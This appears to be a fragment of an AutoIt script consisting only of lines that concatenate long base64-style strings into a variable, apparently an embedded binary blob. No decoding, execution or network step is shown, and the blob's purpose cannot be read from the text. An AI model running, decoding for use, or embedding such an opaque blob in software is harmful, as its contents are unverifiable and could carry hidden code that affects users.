	$bdata &= "MWa4Bqr6g9Dz6/DokOxbm5l9rehA5Cj0iPSk49PY9MyUGeAQ6NAwoBbgPMCAADTsuDfC5BsrmCj75WU42UUL46OlMwcG/T9YzYCOEXP8/pO3uAASYSNeAEj5eCLIZcBcGDQQQDMA0TZsdQhY/Qj3O7EwyGCIEET9DgBfJLoBT6upQFgW4ECK/GOVUwV/IWr6+WtLSSt5QUhg1MMi8GuR5oAN3qWSaUlZaIUwkKL6qW6xdwL/hyxwJgV7Z2lDs7bgnuWUwDBEEdFknnA4sSCkc58TZmVIuHAogHHqAoFswR6gB0YnM3hgQFxpLQjACC0Tn6FDe2oBQvw0wONTeygUGglXAxFTHNdRcRkhcvPEhocNSxK3LRgUwYO6iU6FL3BCriHA0EVGmWGKgRGzoAnFDq1IhkrX/dEy4uFzNzlr0Vo6eIAgBkcrABawCGBEU4Kk4/T8/t1LuI97a3/VSUvJRUfAW8RDwVlbzX3asDp0KPPVPEDWBFwrU"
	$bdata &= "201NuZ4DfEwhpoNAQLfENcKuAED2ggTW9iUcGqB89PpUcoBZjTAK9PJWRYWxJ/VnZ9qDpwYgwiK4Hq0ATPjZROqp3UIqYuHa8WtukPxS/ave3tAbUcwSf9ckZglmf6GGBBrSDCwQVXgZ3Ly/uFunhHWgrMIIGgaCgd3dgll/TOIoHaBYCtzGYbkI4AYieh5qBoE48Z2ZooeeJQyufzYqCgoP6mtyIxtD84lScMk4z2kjXRNYVDmza/53zsROTvFSUvVUVPb0BBAKBWgO3fEEWhbwFvECKNRC0fXWpq5kqKzBfM/e2fnHg1BQwlRU9wReCvOgeYABdmvx9u/sCBvuCuIijtDDq0oKY4N7J4VPClMXPFNIAb0BVGDhP0SFRILlQVgINYU1J24RED8oqgpusDhYvjBS0yKwcIF2P95AgpaJIEJAxDaXgJsAIdQMXFzPBihAU2T09hz1dgO0Rrj+1vMK8XB2hGld2vYK8mQKchJfEFIwMK9w0"
	$bdata &= "9rXFqaDX1/SfPiI8gawu/ZPT/JY9QSCCsRZd4AB4mT2BICQRNZR64NtcG2MIlX+u26E7D8/s+DdS0vyTU30UFB6AwxwWEAQ8QDW5e7U91ZWBezxCnDq1camYN9FRbYAwP3XBliDtF5e3ExM84idjwA3cHxxUFDy3KEDnHwu7vVgZ2fgEpGJbfaDEYkIYL+g6+drm6OjWVnmwvjrao0QZMT2BPXC9xagKWRE8mTWFvSAAPcacOwEaphyW020yO64i8K2vYOAXFzqe3btBV70SkryjveCCgT0g1oiHBpbbccEMInIg8UKAYBEE4AbuEAqNDSxVjI/XS9G90hI8ubzTEz01odeHUj48ludAu46zdrxNzedc4v1bYM1NbFmSUmJgrkSToB2iWxOTvUdOhtgdoim0u6gIRZwWCAQAQoguQrQ/k/5e3vLR0e7BPFM+eqIZ7rm9Qrz4/aPS6Hn2gr03O1eXoWNagJcs/vaAB8Lg0VFutwE9ejaNc"
	$bdata &= "9YZPn2fAr1gth7qH1bCvLZ92Ji5YOjCODQKxJEIl5o7CIlwMXQVlbJZJ4AXQ2A9Ob2XhDzodCXafTU9db9WA4Z4lrNXFzOFg7KbfRXg4Ddzz9VVclISPdKSvh8as4DPDtS+BYc9Pv1Ktjk1wT3gltbzQFIUCSJ3EA80ps+Xl7Yd72aAkb6+ezI+UVFO+18gPNwSkr3BPIcG42MV/Lys72dP7UL+4NGRvhDQ/OmPeL+ifhHR/SC4xD0jXOoWUT3eIJYUACHf0Fp4hrZcpcRX0VCW1vlRERGzoDnrtf57Pj2RET2QTbAa3bycAqLSyB1uujw27ULBWWDtllZ43D2OL/mrQT1ZPdFRfX4gktL+QiQtQRxCvaDX9fAigLZAf5vQBtPT+s/P/RSr6YAf/pBQfRCQvVG+vjzmfprodbyUVHEHxtNgBxhg05O6sABrABG+XZq9vsi/yn0+URE9URE9IhSUoNAAUyA5UwlKiuzaF0OXVw8PLUMtvs"
	$bdata &= "E+ggvAQZwUvMBbsTL6OzuWlrfHCS2mg2zg2vaswJS8Wpw+Hb3+AR7JWyAcApO91xc4YOgACYg3x8gMhSbSkrAPnjZW9c+9+z1CvZAQPcEzkBS6I3c9VlZ5+IF+FiKc4NMTMDW+AxQLGtk+nac+nBGp2RG4hYo5EBknMPYgstckAIUW/vNMBZWVVXMPT34BN41QFf37Pl28vlaWtbgsCEUDmDpsUE1r4NXV5Nfuwaq+nx2+4I/P/cogBswMw8qJS2fWVkCuv6u2cj2R0fwWFjZzrbp5RRgQn7UBRhBKZ9A2uNMbn6CS0v02j4+FKAAIrn0JyCm20lJt2trxCxBIYFO0CxVG8ExgwEqQhJRXLgtjZsEANTLBIrOI8wWoh+DrapaBAH/VJCEqoAKJAWzqlgoAcQ0i0IovwFBhnJJkxdp74hJgAUMgAK9TYR0FB8i/z7nIu0FDP8DJQgIiHvK0+4AVg93d3cGBw/eai/y//8HXw+XPA3GAW8h"
	$bdata &= "C9yKkBYhLTZQsC9viAFr5+fbW4//AIj/+Id3J/J5IJfwhwAPeIgPyM8D8AAAiIiHDwAPM7e1O1AnoAD4h1BMrHIw7wB4J/AQhAgeF4c/j+UbnA3IAg17AQHK5htC0EFHdQB0ACAh9baga38g3b0IEbMSAE0uN2i17L12HiZsFkQKZ4sCUFzzJwxmPwC0Dh7ktl0TCshPjgE/kJ299+UCQwBhymOfAQ4I7Wv3FA0LATdKAIIK6QM2BVDB38kIgTeccgDoAxZ5HRwUQipMRnNuVhc8u9sOkncAM8IBUEHA1wMW1A0u6yIBTufgvd7XTVpkZmH+Cf4LFrxyFxOfPgA8AC8AC9h7Hk5CPnlJ2gBPu3w5OXwCVABydKc8iC4XAhzyCi1OLhg0olK2T8QFhneHDxIaALfuAbBl+l7z4d4MoV8GcntSBAdN719vUibOKUs2uGM7AKFP3H0AMe5OUbzLsYM3AYk6KHdyOTb5bniaWz8XAsrLkPzWU"
	$bdata &= "4htK0bhUjBp8C5eqVIHSMbIjQoGcgC/z0ePvgESAFcnZEp3AHMaReH//5DhT+9641MdUstZFlMxWSWNAjA7ig6471O0XwLmUw7+C/BYWzpO4kBiCWeHZfZOIFoqB//jCU4GKT7gZQdomJgfau5vH0AqAmd9VA1UhHZTqWIr+MNWkJbPhcMBBW/4Owm21Wy3g2IZle+LZm/2//+CYE4NANWL/lZnYkyI+3zffg1OL2UBY9Yw/2n2zWRcTzZfQGIAl0SNkG63QROsuoVRek6zxvLRUx/bO9yCdT7ld5+WR5AwUmJIZbOH1fDCU3BlA/dKQx6aIIGbqkoHJyb5e9gaY2hvHt1PWFsMDeb+i5pmJlQGXDllqFIzwlolsx2GH24f/zq2y3oAV4PfLUrq5YuvKlknWQz/d9jsEDi3jy9Ugh5wU2Yezi2yGk7PHzd3CQj+og+u6JCUWnULeo9e+lGicQg2GNfy5E4PoWzBQbBAWuofWXYD/jucwW"
	$bdata &= "NLHwBz6GyMUXmY8l2rrcz+G455ZJZ2XhRO+HaaVkdOt6YGdgYOMwgmWXYoVwnxsJnt/19OUiBSfhkA6maJbWnmF1qTUhZid7Cz721m/ZC7ZhQAhlctTmEgMGwrfmIq8m9sdMhgT7dKNlIsyZ85qjPej6VjMFIKbYJt0HYitlqTj9onRvb/215aoYuXezpnCk7vU/2AxYi6B2Rv/rEOaw1OfFG5W0hyLGda1mK3bUf3i4JlUUt0Ze8HI51gSbcfFWqPMZ396T6MVBMyS070lZ52nzQ/gldwZVdbDw1OGjRvFuRZjk5ulldbJnsINrVX/gmQ6WIJY66UuzC3kong2rI1AhMJbL9k9mNrJw7lZR9ndi8A7hPbVkr2ZWo8UGMnjQFeJ65zxZILmkcAVaK4t1piV3+7J/QUHwIvD2EWWa88aA8FLsVyohnvKzYKMpn/P4yawYtAYtl+742EX8O7dguce35ueEPudrLBeKUtWvTYdnGa8mhWVuF"
	$bdata &= "ukhdGX4fh+Vt/248Si7P0O7ZNgoNbRs9+5nZR1k66TuDIq82XH1+ZUeBWDM42E6pm4upTgvs2CDCj1H9z23kZ7GUKl4ZO05tcqW2rU89Tz685fgMQbzoAcwqL30v0/ed+7X7QjhqBdn8GUj5tAsMALftfOF4a/8sBCB/ABQLBhuY6XlwnlzlYZqIjGgsjT7Qy/EsLoFJ9j66QMncvD4R5Ve5jrx/WwR8HvEwCIELbHCDSmVv1bgGQPx0gKmcaBlwXIl7BKlBe5/cGACOZwcFaR48TYAXC8L+L7pWLe2eQhctvl1c3Zzwu8K9SBVMrVG+3FmEb4Ke7r/YBFioD7hLvc5bm3Ao3g/N27zIOGKF50mLdfhK3F9o/qj/lU8RnDov4dnNRVIDOET/WDlhOz8dT3ACv6F9NUp5Vxg7CExT8BYyf6xtS+l6HCwwmgvflwqOGMIPDFy4jOyIqK8EGI2x4Fguye4HDAS4zYqViSlRe+3cYSQ+DcVGr"
	$bdata &= "Tt2Pi08+JLMHSA4BlTsNVpjKahMHEQcYmt70io3Hj1I+XO96P5npTVGx3q8Yu8xsQ4Lr9gxUYjLuLAFBmr8fq0CWkhOZUdMhMED2Lk+DMsJ3ONK7supel4SYH3hM2ib+ZmGMMgvrIwywGYcuIWrrnxiq2kZaIH1DBD4z0Z5DCZCKXgv3bQhUxngtxV8+AvZAGt07UxB6ChAelnSK1xu0Ow5HAVzJ1LwLJwMHlVzJlQYNyZVcyQUKBFzJlVwJCwyVXMmVDg9ANNnAEEdUVYRQIaKgkkQRQAWSIoAKZEUAFciLACqQFgFUIDACqEAB6REEzCC1EKm7VgFHZR42dh823xlDUIbZ35JyFU9FTRoSAUFV0exwP8/RNN4VuxO7IKXbUmUtVjcb72lRf1J0bFVuRols90VRE71Bc9G1QthIuGFITDlF6ZlQMiEflQb1c7OIYWlz5y3NBDUBiaxT4Ng0PnRk+7KoBaeDeXAvMfYVdBEBBmhBZIsUe"
	$bdata &= "we2w305KVgw2Ee3s+fUWwRRcxkiqBNBtQFUUy8QbLlDhQ7vdinrq2GWcLvZuMME30G5SXNWG29rByRMZHhhZ5ZM7mDHAPtBG1eqNXCbwJ5YmSXlQQQdlosfV8taqIOB2rCzAYuzURFURQNncxZiqWWBL1/Bsw0PWC9RdRB5UAbnoG5I8G5j+alD4NrgkYnmG02B3cza7B5XfkojQT0cDHb2T3V0cARkRQBTtYCNgeliaVCH43fDVG/witZhp+E0Yh5sVgSVwsY7nxwpWnv9Z1erG9QK0XWgKHRogCzFO/63oE1RmzO1YR8xQsh6uQHDfSSoxwNEdXtlfpBoEU05gWRPZtjs6egiVXBrF0wTZ6INwVg4FTZ8og2zcwtglUHNOUeX6iXa6M8HbHNLIaWLoI41VOdvQYbNGS0dNRtg22RiZ0eda2yDqtF1dHgrJ/3pOYcXKSBsQGNtcFcStW2HNUFkMx8Fa3AHKyVvmdsouLAixnbWdHgMQS"
	$bdata &= "KXuUmNWVhTOUdgMmNS66IuZeN7wc2wjQFhxxNGLgcpHfUj/lTZU/abNf8/RZw7c2WwqGMcTrDxoI1CLbColS0/TdU+OE39UAh202bALRjV6lHry7c4TKmOdgGnYcNoA4IrQyml9pC7MXORjhCHq6RTAtxJUNMBH2HucFE9Up4Vy4McYR6xF+Hx6C1AhsUrGSgyFYxD9nNPAUHlmjxJbkFhsWgzl7+wQNSD6iRiamMFWWM6MCPISjHEHQH5BVnbLnEdOhY9za8BxVNhp+j4OElkTQJEJjeQa4aszQHYQCaWH0E7qnojmEFXx72hGrLc7dPGHLADWQsbhDRh8WJ0XhdVoGnav8JvbUVEu1bRQafRH23XtiBvHV8bUZrIIncwHy2sacOZjrGlmtgOCISXH0HUKl5gBxf3CutQioz0aFZy2AgLDtJMQnnkFUQjhNkqP5iGxQRlK/RnZ47po0gFjnGh0ZdsHIHrR87j/aJnvUtleRlfFrAQ4C4"
	$bdata &= "9HHMfZdtaiitBXxnGrMYyfx2LGcGF9i4nlx+UIMI2Kk+OKF8TdaHC/wJ1+HbHbLFJsm7kU0JffwVJqWCfBBXXxJ5CaS1CvHCZ1NNseTcGJ00dARck6sPRJmRiU5KVmJpPm1wEBkF5Dux0CHCoSNoY2cZUJHSgjQsGT7xra6P99mZmcylNHHQjIBWa1f0nga29TeFrH2e2jUNiI/YpyhK/8GlwUmdbhHj3DMcfLoOQbdjRE986dNblDDiHsixUD/xgVZJbx0RJQnS0lRDC01Z0ckIOcdtz3n1Xau9GG4Y9tG9Q3HlnftjG2Kt7UGUVC8HZfYFCFo5db4o6um1HNlRuXba4D/9CfuEUNUSl4SkZXgSpwYq3BhDAAmPVEW64MQwfhHNEHDcbhx9Ciulj9C1tYChxDhWBfFwLp4FcN1BpeF5Z1BNGEzVD9RAKA1anxXeQmXF+YnQXgcMucOI1HVNvrptHDFLbCmc/G67C4QPn/x82pOEZj+tq"
	$bdata &= "Qmm4bGNbbzcIi23Dqy9kPlyMtjFT1+dQBls7PHLOaYkfByvYPR01s3BI08NCb/uv6El5msK/QrIMzIR28HtErUh57gg9IikBRiW/CpAy5UYUgG9aHVzHC28FNs2njSE8eFzJPAP/aZqmeQQCBAeWla1pmqYMCAqhCVLWPtHjPGzBaE/gAW8FeyXKcKV9yoYKlEFJegszRH8nSXPytCrDEkGa4oB4XVCUT+OuhtwyCxNTBkhlSrUZrDshnYm1bXxthhzEkvW4cmcBx8tGpX95N/sBBDeaIRwwxZvSNZEKzVBoLdZWBycZTCRnHQkWK5JBK2niY0+UWat1p2goNb9sZ0PBYrcISElERmePT60wbFlTDXPt0ERlSu0ByOBtcosJU/n2chwAkr/sRyeaGpJUCU3Ya3h1GToCbfs20Glm2BuWeF/9mH87cYFXrQpRdWmRDZFlDh3rUQK04WqUM0DR22M4RntkYm/QZA3vjSBMDpXvxRUSXMEps"
	$bdata &= "1/NRcrjKJc71MuwiUDJtaZlpTU8iPeTGd5iNDmFYyEVSGVrZcNgYIH5hIRUJgKkYCDstz+cqIkw6vhudkZtxxhW27U7IzIs1oWTpneI3IETnRtFoxcWa1kXk/kxcFU4DetBcLZkH8ECa2Nzj/RyCVZwMxdNoqXhpNLwFmgba2MU10g3bIyPUmm7ZQdHwR7wDMvYdIqBYdPsG8VTH6DDHKqO3RxFS9JsdTIYMowoRVRlYBvRmgUpHYMhnFhIHRnI3mANm1JneUKMQGtZabyM6QpuT0cjR9MpMHsvrBWHUN4KEozoE0cf/zt4OEIKVfByyTaG7Ig0M5pbr9ORqGxQUPl1VYe0E15ScDdtbsiwWFcfjXNHhAQ7ClB5f2vTZLH2pxmB2mLXWFsB451NMFmlGjVjXea2QXRU6TX3H2FzfQRlMlO2gkNYlwOJH7VIPSwxjWzWIjUBtRfW8FBLoWOekQVeHczlb3m7Y/VdIMCTjGxzEUUUG7KKbZ"
	$bdata &= "h5Sy8FbW9FgtURWxesh6cAnmGRHTSmaHAhwkrKys/RtrruOshw11OJnzYgFZdYoSWtkbLCGz/g4AuBGdmedqSlYFEZAxsipqxD1U+astbenz/1wGKLJyFJZjNlXYofYMuU9dYGHTuybm3VPxkyXWihmrMjRsQSJ2UbHwNqyro+O1aqpqwBkTFlZTgKbF89QjVlDQEJ17jug51zTCvpQCvA2h1NM0YAlzXptW+5dSwuDLzT1elsJ36XQculRXFqpRIThrvxA7CYSLPi5RhEj+gh4+3Shfh/AO2s5AUGK7alUkNnQb8dGpFaQVK/Pk87bgFBcvr0/3N/82/TBHRwAAEQBxEE5gUP8BQBD///9v8OYPDjBCcWNQfwnAMg8QAP4Q+xEBYdjFESEmEdFf////8n8HsB8GIClWfwmQIPXIUPYm8PVG0QSyx5DztWD0MKaF8h39rwLIJhA8EPYZER8P//b/h/ARDwDJ4brBDtKA0GDwpUWj0OURM"
	$bdata &= "6BgkHDOD/v+ATKAoSCAgRKQrw/gLwbQETKZQTRD3vPvi/JAQPoJfnBkpDDhlZOcUYAcQR3w77/3/lHzEOLAwYCAUSDXxHTiBaNoCMjaCbkJUG63fNtwB8RVEWF2UJWzc9dfAL+/9/uygnWUAAOjwcIBU5EyNQEi88EQw7ThUFBQ4FgKXYBR01F3+greQZBVAeOhYauC244f9HBiIVHRYsQlXwINaJAn1SAgTgRRecAQ8TSA9BISxUI6GH////v4JrAklFShwSWSJBOl+fPvCLAVQYHPD2ADIJ8DMBEniv+P//8E0CIrKwjRTwwQMT8FoBb/A0BBDQug8eYwV9w//bCBIEMhMRE9/Nc+pD8IICbFYcJBwUVvz/v3h1AiMGNkIQbgbwVQE3RzQLPAoRLk7/AP/fsNkGDwEwATYhIkIRGaYPGYENEQgGFe1X2BwFHkgkExnwDQFkllBKb+2/bUIIVD4LPhIWJRMe8BAqDNIdCToNCv4/+BIt"
	$bdata &= "Fx0SCkOoa1IiRQckWgZqKG38/3/TYL8TDi4gqwopGXkiRCwmTg7wDgFAGiZv/ysWQAspxlMjDTQzTT4GBg2KCzsJE/AV//iROIIIFzwj8P0AygoNGuQaBIPf3h4rDZptVJkRYxMyB0TG/xf9P/DRE6rwQwEOFLINJwsFNl0R438R0Ay0v+MIOQveOgGQeDgaGQEsO2eedUQargAWBxgTsyC3bQcBGiUSa6t2agcxGgF/7NZCewEZOxQBvRDbQktTHhLhBFvtA8WdJhbvpcHgCTkTEXHDGIZgCRpXb2oYBQcSxYnYDWLbKQsCUypYeysbz4VtQLHYAV9XC3CkjkUpAf+JCnktI/AGAYpEHBQqXYB/8g9fxAR7m28QLR4u8wAqAV71d5QBAQ8gTxY8MvDiAlI2bncN8BBESmDm8H0EBoADnW26ut4I7QETfUQDDngVA+tV/3e8ywFkEicqQBRl8KR0JBYqLv9v374wDGG9yy+I8CMB8GYE+"
	$bdata &= "wDwygEWrPBnAR805v///0Yq8CUB3OMTGJouJjoPNR8YFSkr4WPwIgHw6N/+//8uAWFHfGEZB1rtcCkHCwc5WRFPB4nwSzAaAYZskwUXNLNfHVQUhGmWakRJ///bb9wRTQ4mRzUUHEMbJcQztBkJIQoTXfAvARsvRfj//z8wQTVGJVgwkA9eBw8uE60OuGnwsXKAf9e3BcAkfWCpDuIbbbAtD4EQGdVh/X+7bQjwuzYFDAgEPCsUHDpKDmAKMkYOVVv7M726whEYGXSiTJ8Oko4USCYR3WrPvSoDExsDlP9vBaMDfDgw8AUBahUcM2IrGAkT/y7C+h4rrfCVJGoPDHopEhNc/v9T/CAnU7yRXycTE41PGjLCQfA3ATojexgib7iIkoABL26iqQIOIf9/v/0NRA1hEVFoczAwGTNJmi0bGmFWUY8NdJ0QMt3w/7cPPEo5DWMWPwwYH69hgEhgySBoSXl/EyrwIiEQRlN+eS6TZKArZf//7f"
	$bdata &= "99EQ+ILCokDh8RMp5YOhB1HQ3w7AInH0hJNkl2Bv////9ldQZpSRimy3yBEQyVgPCIAWcVuzMFigZRDFVZaDAsGC/4/45uVFMBbBghPQvTNjrwPAJAtwFwIX+/Cv8digs4H/AqAc4QqfA4ArEWa6ETc///2/+7J70jTBNPIQsGehEhE2wMpy4QKhYe4g3TMBI/IH/H/x0mjAFHETGtQTE9ETXUByYFErkcI5jw4WcRzRydFh9MpDs6QcGOX/JwFvD4ngIC/GVygo4i/EASDYU7Pjc0IpGO/7d/ET6YXB2fcRsnGlbwdQE2DbBUCts3/P89IWoJDFMgGRgUCRQNgxj3ABUkMAwCAf//3/4xOxweJhIQomMhGFpFqFEuchUZIwohBhAsLgoOCL+o/f8QCBIkDJQlBkInEGwkCXRMulJoMS6Hd7jJ9P9ngUImE8xDfaaLoA+gVm8BFUX4Cy6Ev/AtSj8ChlwQIw+qcD78QcMPHxQsYplmblE"
	$bdata &= "UivCX/oL/3wQSASIKFhOUNll+ByMMCUwHCga3Dz0HgopfjMrw11YXKYZGSH/VregGEhy0fHo6LxM48NsBpRFxEsWC/47uZrXki/CPARmXnFyTIth/x///Mw2M8AcBow19azYRYD/wGQGSJ/ArAU7w9Cv+//8AUJEibEQjHh53TTOD8FEBXRs2DxpuMAQbHYP2d/xneA4xDyImER6cdRE6VQSF+L89/I4gphWHM0szE3RCNhMhblcRKf90+PJm8IcCQisSwyJBCfCKAfF/c/FISjEvQiPEHBYQpPAeAW4Tl6/+vzuM8PoAf3vdOJoUOw8bFrbIE/1NK/iD4HExZtQ4lONkFhhYJB9A77hocmKuOKgmMkN3PFlX1xftNLo/HiQqevBesGrk/2bfXK7dJDk/D2+W6myilaxacgzw7q343/EBEYwX2tEBRRUUThOQHzL+dgP8NBg8CHdMQ3IppVHD3/FzAWcgEzkR9hsbVwbp8Jls4v8VfwoQ"
	$bdata &= "DDMgJQ/Y8BYBJStaWmclNWYdAEsofvW0cl9txCVeVgNTBgaG58AhEf/YV5gCkEATG/CRAReRBiYeHCFw9U/sHx8kDSM7SzRMSYp/A77iVu7tgtYBmRgJA/AfARS/ZsR/Bg8NBQ4LGw8KEt4ZDRceAvwj/yAMDSIQEg4lHRBEDCAOQiQd32b8Qw4KOzMeLB4sCBcjDhbqEZ/pvBs+JcEcE3qMB7Vv+L+AJRgqIBogDxk5Dgm2HA0eGiqqF8B/+PkQGhouEYo3+gwGNxYlFhapvy1wFxiONykpLxwKG///7ypWDLRzAqg+IAkzMXsnE0wVTA88IhwRFbsKNuCiEAtCDS4+GhrMAv//gv8THxILLCFo8AiABAETI3qiFi4tEk8vohtwEzdjrMZ5Kr48NAEK8AMC////BDmvHEsOLjQRJUMJEAqjuo1/Eg96ENEOff//o/9HEiOBblwSLIE2ww4rpw8txA4qMA0rE8lJEn9kBbcz5HQBx8K5B"
	$bdata &= "H4TnzZtXf8/t9d/+xJREvBZoq8Sp3cSmyike0A4aREdO16R4kQWSFuuIB4QIsI+D/j///aASlCYGHpqaRBeOCmf8LUCEncV319wJ18hKsEK/K/KZAGwOlIO8MQCY74RUBo2tW94EfAdArqXE97wn6Kk5jQBA5t2mu5pAWgZa+/4h6cO8hvYnBCVJw1sLhoQzCsK2v8sUFtwkxAkFhIVAEUqeWwJIZ3iP8EMOC0oDwsSBzgGF2wa/4J/025mIwY1EiAmBxcYPgdDKBA3Bz9+K4DpMxA4bPxBCCUQQgcwIoNj1z8OG2K0NdxJae4W/3fjXw8CDb0dHRf2Q0USGgc8CzIzKVXeWNXw8JACQk5LGBRtD5Hd/osusht2NAgGBw4YBgUHBat+xd8kDhAdMTQamSIGL8IfNgU0kR/+by/AIAtkKfAKAghOEHWNCy0FGgVpQfE7qt5GTzEwFchA0BV9PHJTLQALzs5MqpoCbAkI9N/+v+4MDjcvFC"
	$bdata &= "AYGyBEGxcVkE83QRqkEzo6NbYL8N8EIXAYGDMGUD09UBEQEcQzYX/XixoQF4IZGDkKdhTiHhYIMR2fgl/wOAmAD84RBhEtE5ZeFabM9m96Da/wJxwGNAYLIRptP3Te/gbFE1J2kns5CQ8FQw1YNyJRKpj+DZvyKBewXU218DIBHEG2/0X/N2wFIJQxBYUICC9Ws+weWSILNw9aG003Of7bFxpIHwYowmU2CgUi5MI0HTIwCP7/C6QabC0wHR8dPiY5MiEKQrTRE1yrgAcDDdYBuv9/g2k5GIa4EinZHjh4WF7NIvAYAZKYatI62hAEASB0ZPj/Dbg1Hxt5FUgzrlQuCWbwt57zGSpewnIIOTfMPpgHWf+qb804WlI3zhYwNGiRNEhITlxOTv/Zu7NaAV1aFWNdVFcKMMcNFg0jPxtuK/49CwYeswotRBd7BIgbIp4JHP6vWPEFKh0l/M8Fag4BCTZiKAVEBlQ8/gLDb24whBOtMrbUw2A"
	$bdata &= "KCBAQCP83XdAAc+pidjiMLfBGBhivBRsWBxAuuKvjeAVVJIHSRYlMEPAkAY52w98ISZo5QRIeE7RaJwgaVI7D/0UNHjVgKghBDDQnFAsKFyRsoAj2WxMkCRgUFAUmpD5M/KvaX2qR8GIDBAHrLU8sD3OCG/5zCQhJLJAvVCYoZqdZHNas4f+mIATw8wE3Mj4uLi8uKcQGAfqt/XQKCh4dPQBJBE0xSB8YHvaLdqj4FimoCzQjDyIQExgLV7wRXSeXmjtuGwZKQosIYjH+pqVkMiAy8KYELR40PlaBQnTcEVIOABQw/QV41aYZahYLFi3QdhKrVgkJF7f//1daCgxFLRYZRw4XHjQWKCENMCGBEAlIDzcMuL3Z/yMJGhUUIxU4DglGUggP8DWSJLMrp1r0lYIX8KsCMvgQXBNdPHyBtaKPjAsA1FICGrATGgqLK9obKbEMUw0UEaaUGw+x/J/hXUMp0g8PYhNrGAd80TotUDRG2ptiNWWY"
	$bdata &= "BPIASyc1xgD7vwcI1jBcCAmOlDc4/7/ar7qpTDZoCTM7Dc8sEmrKMqfwnAEr39G+SzZTd0wUIdADjrzw6gG4Hf9vgpqm5pgBXw0vDUIPPQ8tDSgmk4L//w0lDR8PKSwcKyUbGTkZG0sg5F3/8P8VokdkHicTDBWC8FsB8MwysV2VLhYAf8DxiDkViwkHHyibaYoDdpFUPCMUWUEFKkiAiv/iGRoqTwcUNAlQFxJgMJmhyAfqBhx8h/8F2PgHFSwlBxMVdEnNEMyGNv9P+P8fJ60wDS02Gp8HMUxckiAGGjwGQCgdHP8Eb44KeGIfOw9uU4UeDyciNxJdBVD8DCwYEgtdoDQGtBL/F6oAMnSsCwEjYBkVI90Pmg94GxX9nZGM8EcBlZ60NTYPL/j/r3CEX3k4FTkzFDdTGlK8D6IZpnjwTwIj/7BNhxYQjAkKARREKxJLCiH/q/4dgkQSTwYRglwVRgxVMzhrBlEGJCNv/8G3NBZHkScYL"
	$bdata &= "nhwESMh5AgZlpi0GAV5q/hFWAIgpMo1GdAF9ikmHgcD+f09SgYIZgsbBywhKjLjN8qpvhhEcp3w9QDX9q4GvLwL8LMFws58VgFhBUBf/49lAxEVEhyUC3oaKwUVvA47UYGmT1YvHgOK8BDhFf//AhJACxITQLgNEA3rRR7wQq4WECYW/wV/g46mLAUKNBgMBoIbMRwYUy1vMyAPFuD/MzY28B0BHUIbIRNcSxWOH3hVm971OAgMCKIFEgoHCBYKyghhwbdVWjwFHh6FDfCPJDgRv+H/or/DFg4mNhYVIFCyHFsLLQsI3/T//0ASYg0qNQg+OTIKYmFDUyE0ry9m+uwBgnMXF3wH/i4Xc5gZLho+IwsjTzpWAxEU+/834ThDBkRPKT4GE+fwzQQgBeIOI50KLt/1F3wUNRgLJD4JQAUoIiUTBiVIGSwGCsH2ogt4BhQHJA9eHuxq24IPhgwODAYNFg2iDSFb8IIXgC8GKgbcJGwjCrJHEz"
	$bdata &= "R2E4q2RBQOFBZTBxBdAnNoZAWzBvSyBdaBtnUDDYYQHWwe0ipirNO+2SMH3q4TJJMgEGYNhge73bbwQQJGGgUPxtoLuBONzBxoXm7m+qhVE8xMDi46dmMgQHvDfwMMMyY6RfDTARaABxIXVBDgbQA7FhLmJhYLByUUGemuhLycHykGAQcILVoTmD4eUAvSEHSvqAA26B0MYK0sHhQGaAXwevoOwPAmAYJJDpR961glhDAKYPYQ8QBMCyor/j+sEkDUFAeythg7GEoTGG4Cu4epvUCmJh/whkSNRfCEFCgG/wE3CiAgNC+UUMZkD13/9jeIHBIOEQomL+wjKrsWkjzwg6gK/+9q/7QPdw3bCpw9UJrYBitQCDoKKBlBMBJSx3/r+gYiHiI4whMweSILNBAqCB8QykwNu3SdOhdIETr+Dojxf9Ur6goZChN0NRNwHUhiH3UMExL/Nxj+nhcZHAmacicpESDFJkpERkRk/x0L8BcRPC0wDAr"
	$bdata &= "WMDCXryN+0fB+RXpTgwJ5TqrwkwK8AidMgzQFeIOcMbn6L/pE8CwDZdJSBbnwngFKCSw3TWs4zij+MwQ2O/ARAa2iouqcFi/yO6imJhgECP7v+hXGMJl1bA0IzAwLK2CSxbhnqHS/QoB2o64QEQgELQB8hWO7LDsWFggIHl6US2Q6FEfr7f9Odi8gba0RMAhfCCYkNEMtX0D97du/yAgiUXAvP5gUOCFD8DYBcg3VSjFCNx3jsek3vk2NbVMLa/I0NHaZEL+hoIsiBRgaHxgn0gQk+r+j8A/MIAow8KcBDZ4LPAnA0dHMcGwomC4QQzANK5RX4T9GDBAKdj8FioL/olFiDRMNIkoPOQhNLhL+U5h24qwBE6YIaowGUo//O34HN1ISMReSHwU2eQYZBskjDQzCFHiD/SQI8BsCBQDqDkcFRVChy1HQAm8QhpZ2Ml+kf8dG9jsncKActiNBrqOwJxM19Hd8xRaC2K4RfywocvArAwfwXAE5"
	$bdata &= "BE9NnKgYpA1ygHf8oj9sah4eO/50DXANbQ2aZQx4Q3/B/xoJKk1UGDGzSQ26Pi+rYjAPC3h/g77QHkshDCeW8MUBEhIdEgH89ujvNFsdKjkP3RJGLKZIAvD/AR9BMLT/P2xuMsA5LA1oNTAJGwwAJeJXM1fh6MoJARoGQftf8IYDNkZ0CGso8JLwRAEbUWDDzfehCiI7EaTwCQIuEc5gF/wqSgiz4pkGonCgF6Eb1kxG/S6N8NAImqHj62ohVA0dDBViG8xh//8C1hgPLF8l8KoJ8L0D8GKyDNy0QKQCQrCaDjCI/uubEg+B8NQBkgoPfxMToP+pEnd8YmB1GrooMg+8CREP/0d80zYKwmA8JWNQSRwWERsNMEH/7e5oCiHWKSMczAAnEJpYGTEnGBIFLzD8NDcPGhYNrAhxMQ0k+Aj+W5PiKxIU5nRQEioNWzolMNIuMJD6lPwAOyUwSDg4KO0XtWJsKhI2aBYjKDgwKEI9/P//zSsoS"
